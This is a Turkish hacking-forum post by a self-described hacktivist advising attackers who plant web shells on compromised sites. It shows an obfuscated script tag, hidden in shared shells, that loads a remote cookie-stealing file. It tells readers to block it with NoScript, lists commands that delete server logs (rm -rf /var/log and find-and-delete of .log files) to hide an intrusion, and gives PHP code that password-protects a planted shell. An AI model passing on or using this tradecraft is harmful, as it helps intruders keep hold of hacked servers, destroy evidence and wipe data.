Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Shellde Log Güvenliği Videolu
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,355 / 1,355
Deneyim: 22 / 100
Rep Sayısı: 2688
Mesaj Sayısı: 6096
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Shellde Log Güvenliği Videolu
13.09.2013 23:41
Shelle şifre koyma videosu = http://www.youtube.com/watch?v=9XHBPrp2wecs

Kullandığınız shell Scriptlerin de kötü niyetli kişiler Logger koyarak,sizin shell ile girdiği adresi Logluyor.
Log tutan kişinin shell Scriptini kullanın ama log gitmesin,peki bunu nasıl yaparız ?

İlk Olarak Loggerli shell'i deniyelim.[/B]

cyberizm

Shell ile girdiğiniz varsayarak devam ediyorum.

Ve Log Sayfası;


cyberizm

Yukarıda sayfa Loggerli shell kullanılan adres IP ve kullanan hakkında bazı özellikleri bize Logluyor.

Şimdi isterseniz bunu engellemeye çalışalım.

Firefox NoScript eklentisini kurarsaniz JS kodlarını engeller,


[URL="https://addons.mozilla.org/en-US/firefox/addon/722"]https://addons.mozilla.org/en-US/firefox/addon/722[/URL]
Adresinden indirebilirsiniz.

Shell ile girdiğinizde alt tarafta böyle bir uyarı alırsanız kullandığınız shellin Log tuttuğuna emin olabilirsiniz.


cyberizm


NoScript Eklentisi kurulu olduğu zaman Logsuz istediğiniz shell adresini kullanabilirsiniz

şimdi logları sılmemız gerekecek
bun ları şu kodlarla yapın bazı larını aklımda tutamam onun ıcın not defterıen kopyaladım hep

rm - rf /var/log
rm - rf /var/adm
find/- name .bash_logout - exec rm - rf {} \\;
find/- name *.log - exec rm - rf {} \\;[/B]


Kod:
bir shellin log tutup tutmadığını anlamak için
Öncelikle log tutan shellin ne özelliği var onu anlatayım.
Diyelimki sizde bir shell var.Ve siteye shell sokacaksınız veya RFI ile bağlanacaksanız.Eğer shell sokar veya RFI ile bağlanırsanız
shell yayını yapan siteye sizin hackliyeceğiniz sitenin adresi gider.Gidincede site sahibi sizin soktuğunuz shelli görür ve shelle bağlanır.
Anlıyacağınız siteyi tek hackliyecek olan siz olmazsınız.
Log Tutan site nasıl anlaşılır?
Arkadaşlar öncelikle shell yayını yapan sitemize bağlanalım.
Örneğin;
www.deneme12345.com/yayin/r57.txt
Shelle bağlandıktan sonra ctrl+f yapıyoruz.
Karşınıza küçük bir arama bölümü çıkacak.Arama boşluğuna <script yazıp enterlıyoruz.Karşınıza aşağıdaki yazılar gelene kadar
enterlayın.Eğer aşağıda yazıklarım karşınıza çıkarsa.Bilinki site log tutuyor demektir.
-------------------------------------------------------------
<script type="text/javascript">document.write(***8217;\\u003c\\u0053\\u0043\\u0052\\u0049\\u0050\\u0054\\u00​20\\u0053\\u0052\\u0043\\u003d\\u0068\\u0074\\u0074\\u0070\\u003a\\u002f\\u002f\​\u0077\\u0077\\u0077\\u002e\\u006d\\u0065\\u0074\\u0061\\u006c\\u0074\\u0065\\u0​061\\u006d\\u002e\\u006f\\u0072\\u0067\\u002f\\u0062\\u0061\\u0074\\u0061\\u006b​\\u002f\\u0063\\u006f\\u006f\\u006b\\u0069\\u0065\\u002e\\u006a\\u0073\\u003e\\u​003c\\u002f\\u0053\\u0043\\u0052\\u0049\\u0050\\u0054\\u003e***8217;)</script>
<?php
ve
<SCRIPT SRC=http://www.siteadresi.org/yayin/ciz.js></SCRIPT>
-------------------------------------------------------------
Bu gördüğünüz kodlar karşınıza çıkarsa shellinizi silin gitsin.


Sen çözüm olarak Shelle şifre koy kimse bişey yapamaz.

Kod:
<?
# Konfigurasyon
$sayfaSifreleme =***8217;1***8242;; # 1 acik , 0 kapali
$kullaniciAdi = ***8216;KingSkrupellos***8217;;
$sifre = ***8216;MHT***8217;;
# yetki kontrol fonksiyonu
function yetkiKontrol($kullaniciAdi,$sifre) {
if(empty($_SERVER['PHP_AUTH_USER']) || empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_USER'] != ***8220;$kullaniciAdi***8221; || $_SERVER['PHP_AUTH_PW'] != ***8220;$sifre***8221;) {
header(***8216;WWW-Authenticate: Basic realm=***8221;x***8221;***8216;);
die(header(***8216;HTTP/1.0 401 Unauthorized***8217;));
}
}
# Sayfa Sifreleme aciksa
if($sayfaSifreleme ==***8217;1***8242;) {
# Veri ve sifre kontrolu
yetkiKontrol($kullaniciAdi,$sifre);
}
?>
PHP- Kodu:
$kullaniciAdi = KingSkrupellos
$sifre = ***8216;MHT***8217;;


bölümüne gelin sonra kullanıcı adı ve şifrenizi kendinize göre düzenleyin.Düzenleme işleminden sonra kodların tamamanı kopyalayıp shell kodlarınızın başına ekleyip kaydedin. Artık Shellinizi attığınız serverda çalıştırırken şifre soracaktır.

Nette buldum hepsini biraraya getirmek istedim.

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.

cyberizm

Alinti



1 Ziyaretçi